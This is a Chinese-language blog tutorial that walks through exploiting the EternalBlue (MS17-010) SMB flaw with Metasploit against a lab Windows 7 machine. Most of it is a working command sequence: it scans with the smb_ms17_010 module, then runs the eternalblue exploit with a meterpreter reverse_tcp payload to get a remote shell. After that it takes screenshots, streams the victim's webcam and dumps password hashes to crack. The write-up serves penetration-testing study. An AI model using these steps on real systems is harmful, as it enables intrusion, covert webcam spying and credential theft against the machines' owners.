一、永恒之蓝介绍
永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。其中漏洞编号为MS17-010,利用多个SMB远程代码执行漏洞,可在无交互的情况下获取系统最高权限,又为远程代码任意执行。
二、metasploit工具介绍
metasploit 是一个开源框架,这个框架用来做渗透测试,其 msf 是由多个不同的模块组成的,在使用方面的话,可以在 kali 中直接使用,命令行 msfconsole 即可
模块介绍:辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块。
Nmap --script=vuln 默认nse插件 Nmap vulscan vulners 调用第三方库探针 加入拓展扫描模块 https://cnblogs.com/shwang/p/12623669.html
三、实验环境
攻击机kali :192.168.93.132
靶机 win7:192.168.93.133(win7 需要关闭防火墙以及未打永恒之蓝补丁)
四、漏洞利用
1.先对靶机进行端口扫描
发现445端口开放,可能存在MS017-010漏洞
2.启动msfconsole,搜索search ms17-010
3.利用模块
搜索有关漏洞的模块,结果看到很多有关该漏洞的不同模块,可以使用auxiliary/scanner/smb/smb_ms17_010这个模块进行验证
> use auxiliary/scanner/smb/smb_ms17_010 >set rhost 192.168.93.133> set rport 445> show option
>exploit或者run
发现永恒之蓝漏洞,开始调用漏洞利用模块按照以下参数来进行攻击
>use exploit/windows/smb/ms17_010_eternalblue
>set rhost 192.168.93.133 >set lhost 192.168.93.132 >set payload windows/x64/meterpreter/reverse_tcp > exploit
反弹shell
>shell
>whoani
1 .捕获桌面:
meterpreter screenshot
2 .监视器打开
meterpreter webcam_stream
kali会自动打开浏览器播放被攻击的电脑摄像头,被攻击的电脑摄像头也会变亮
3.获得用户密码密码为hash加密值,可以利用在线解密进行破解
meterpreter > hashdump
4.sysinfo查看系统信息
标签:metasploit,set,192.168,010,漏洞,0143,模块,2017,smb
From: https://www.cnblogs.com/mu-yi2/p/16720615.html